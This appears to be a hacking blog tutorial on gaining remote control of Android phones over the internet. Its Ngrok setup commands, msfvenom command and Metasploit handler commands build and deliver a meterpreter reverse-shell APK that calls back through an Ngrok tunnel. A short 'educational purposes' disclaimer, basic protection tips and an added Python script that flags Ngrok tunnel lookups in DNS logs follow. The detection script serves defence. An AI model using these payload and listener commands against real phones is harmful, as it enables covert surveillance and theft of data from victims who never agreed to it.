Hi Friends. I hope you guys are doing well. My previous post was about hacking an Android phone on a local area network, but today's post will take you to the next level.

We will hack Android phones over the internet (a WAN) without port forwarding. For this purpose, we need to create a tunnel between your phone and the victim's phone.

To do this we have to use Ngrok. Yes! Ngrok will provide a TCP tunnel between two parties.


Devices and Tools: 

  1. A non-rooted Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
  2. Termux Application on my Android Phone. 
  3. Metasploit Framework. 
  4. Mi Phone (it will act as the victim phone).
  5. Ngrok

Disclaimer: This post is for educational purposes only. Do not try this on an individual's phone. I have done all the tests on my own phone.

1. How to install Ngrok in Termux:


The screenshot below shows my Ngrok dashboard. It provides a token that acts as the authorization for your TCP tunnel.

Download Link: Ngrok file

After downloading the file, extract it and save it in the internal storage of your Android phone at /sdcard/ngrok/ngrok

Note: Rename the file from ngrok-stable-Linux-arm to ngrok.


cp /sdcard/ngrok/ngrok $HOME : Copies the ngrok file to the home directory.

chmod +x ngrok : Makes the file executable.

cd .. : Moves up one directory, where you will see two directories, home and usr.

cp home/ngrok usr/bin : Copies the file from the home directory to the usr/bin directory.

After typing the above commands, type ls to check that your ngrok file has been added to the usr directory.



./ngrok authtoken <paste the copied authorization token here>

ngrok tcp 4444 
 

The tunnel is now in place, so it's time to create a payload.

2. Create a Payload in Metasploit:

cd metasploit-framework
./msfvenom -p android/meterpreter/reverse_tcp LHOST="Copy from Ngrok's Session" LPORT="Copy from Ngrok's Session" R > /sdcard/hackming.apk
LHOST= 0.tcp.ngrok.io
LPORT= 12345 


I am using these values as an example; you can type the value shown next to 0.tcp.ngrok.io.

3. Use Metasploit Framework:

    ./msfconsole
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost Localhost
    set lport 4444
    exploit


Some Useful Commands in Metasploit Exploit Section:

[Screenshot: ngrok_Metasplot_Termux_Commands]

A drawback of this method is that you can't get multiple meterpreter sessions over a single port. For multiple sessions, you have to repeat all the steps with a different port. But do not worry, I have a solution for that, which I will discuss in my next post.

How can you protect yourself?

1. Only install apps and software from the Google Play Store.
2. Make sure you don't have installs from unknown sources enabled.
3. Keep your phone with you at all times.
4. Avoid opening any suspicious links in emails or messages.
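
A phone running a payload like the one above has to resolve the Ngrok tunnel hostname before it can connect back, so DNS logs on your own network are one place to look for it. The following is an added example, not part of the original post: it scans dnsmasq-style query logs for lookups of Ngrok TCP tunnel names. The log format, the sample lines and the hostname pattern are assumptions.

```python
import re
from collections import defaultdict

# dnsmasq "log-queries" line: "... query[A] <name> from <client-ip>"
QUERY_RE = re.compile(
    r"query\[(?P<qtype>[A-Z0-9]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)"
)

# Assumption: Ngrok TCP tunnel endpoints look like "<n>.tcp.ngrok.io", as in the
# post's LHOST example, optionally with a region label ("<n>.tcp.eu.ngrok.io").
NGROK_TCP_RE = re.compile(r"^\d+\.tcp\.(?:[a-z]{2}\.)?ngrok\.io$")


def find_ngrok_tcp_lookups(log_lines):
    """Return {client_ip: sorted list of Ngrok TCP tunnel names it resolved}."""
    hits = defaultdict(set)
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue  # replies, cache hits and unrelated lines
        # DNS names are case-insensitive and may carry a trailing root dot.
        name = m.group("name").lower().rstrip(".")
        if NGROK_TCP_RE.match(name):
            hits[m.group("client")].add(name)
    return {client: sorted(names) for client, names in hits.items()}


# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
Mar  3 10:15:01 dnsmasq[512]: query[A] play.googleapis.com from 192.168.1.23
Mar  3 10:15:02 dnsmasq[512]: query[A] 0.tcp.ngrok.io from 192.168.1.23
Mar  3 10:15:02 dnsmasq[512]: reply 0.tcp.ngrok.io is 203.0.113.10
Mar  3 10:15:09 dnsmasq[512]: query[AAAA] 0.TCP.ngrok.io. from 192.168.1.23
Mar  3 10:16:40 dnsmasq[512]: query[A] 4.tcp.eu.ngrok.io from 192.168.1.40
Mar  3 10:17:05 dnsmasq[512]: query[A] tcp.ngrok.io.example.net from 192.168.1.51
Mar  3 10:17:30 dnsmasq[512]: query[A] dashboard.ngrok.com from 192.168.1.60
""".splitlines()

if __name__ == "__main__":
    for client, names in sorted(find_ngrok_tcp_lookups(SAMPLE_LOG).items()):
        print(f"{client} resolved Ngrok TCP tunnel endpoint(s): {', '.join(names)}")
```

A hit is a lead rather than proof, since developers also use Ngrok for legitimate tunnels; follow up by checking which app on the flagged device made the connection.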
       